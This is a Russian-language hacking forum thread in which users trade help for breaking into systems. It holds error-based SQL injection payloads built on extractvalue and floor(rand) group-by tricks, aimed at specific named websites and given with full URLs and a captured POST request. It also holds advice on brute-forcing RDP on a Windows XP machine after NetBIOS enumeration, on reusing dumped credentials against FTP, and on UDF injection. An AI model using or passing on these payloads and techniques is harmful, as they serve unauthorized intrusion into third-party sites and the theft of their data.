ХЕЛП если Code: 'and extractvalue(null,concat(0x3a,(select concat(mid(КОЛОНКА,1,64)) from ТАБЛИЦА limit 0,1)))=' то You can't specify target table 'ТАБЛИЦА' for update in FROM clause
ищи интерфейс для подключения к БД (PMA, Adminer, etc), или попробуй подключиться удаленно. так же пробуй эти данные к другим сервисам, например FTP (бывает что совпадают)
Здравствуйте, имеется компьютер на windows xp (другой есть на windows server 2012), на нем есть RDP, netBios. Получить в NetBios список ресурсов получилось лишь пользовательский, хотя xSpider смог получить все: сборник - пользовательский IPC$ (Удаленный IPC) - pipe по умолчанию D$ (Стандартный общий ресурс) - диск по умолчанию ADMIN$ (Удаленный Admin) - диск по умолчанию C$ (Стандартный общий ресурс) - диск по умолчанию Подключается лишь к сборнику. Остальное - не получается null login не работает. Получил список пользователей, я так понял netBios имена, это пользователи windows, вопрос, теперь только брутом RDP брать? Нет ли каких уязвимостей? Поиском особо ничего не нашел. По данной теме. Может еще есть советы по netBios
Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое? UPD. Закрыто, ниже frank ответил.
Полный список всех методов обхода сейчас приведен здесь: https://rdot.org/forum/showthread.php?t=2860 (5: group_concat, benchmark, @, insert, replace). Наиболее удобный в стандартной ситуации способ - 3.
http://mariin.ru/index.php?q=12' www.mariin.ru/index.php?p=forum&action=getfile'OR/**/(SELECT+COUNT(*)/**/FROM/**/(SELECT+1/**/UNION/**/SELECT+2/**/UNION/**/SELECT+3)x/**/GROUP/**/BY/**/CONCAT(MID((select/**/user()),+1,+63),+FLOOR(RAND(0)*2)))/* Нужно узнать префикс таблиц, чтоб вытащить админов. cms дырявая, но 4 версия mysql всему мешает. Рес оч нужный, прошу помоч) PROCEDURE ANALYSE() заиспользовать не получилось, мб не правильно делаю
Приветствую, помогите со скулей, сканер накорырял. хттп://karelia.pro/kondopoga/business-internet/ там, справа есть форма "Заявка на подключение". В POST запросе передается пара-тройка параметров, но ошибка возникает, если запрос повторить, вылазит ошибка. <p><b>MySql error:</b> Duplicate entry '89.234.157.254-2015-10-07 12:23:38' for key 'PRIMARY' <br><b>query:</b> INSERT INTO `business_logs`(`ip`, `date`, `oper`) VALUES ('89.234.157.254', NOW(), 'none') POST /apatity/business-internet/ HTTP/1.1 Host: karelia.pro User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://karelia.pro/apatity/business-internet/ Cookie: __utma=86736642.1434525950.1444154760.1444207012.1444209648.5; __utmz=86736642.1444154760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=bc74f0fe64381cab78e74ac0e4d67963; __utmb=86736642.2.10.1444209648; __utmc=86736642; __utmt=1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 140 name=%C8%ED%ED%E0&city=%C0%EF%E0%F2%E8%F2%FB&street=%CC%FB%EB%EA%E0&house=65&FIO=%C3%F0%F3%F8%E5%E2%F1%EA%E0%FF&phone=3336324&info=&send=%A0 не могу раздуплить где формируються параметры из ошибки, откуда ковырять. Sqlmap-ом утюжил пол ночи, он тоже не понимает, только false positive. Единственное не пробовал в headers ижектить. Посмотрел заголовки в burb, походу како-то js скрипт эту инфу отправляет. Можно это как то раскрутить?
Привет. Подскажите пожалуйста про UDF-injection . Как понять "пользовательские функции" и по реализации. какие отличия, минусы, плюсы. Спасибо.
http://kaoticcreations.blogspot.com/2013/10/battling-windows-mysql-from-root-to.html http://kaoticcreations.blogspot.com/2013/10/battling-windows-mysql-from-root-to_19.html
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос - Code: extractvalue(0x0a,/*!50000concat*/(0x0a,(select database()))) для работы с другими базами (как перебрать имена всех баз)?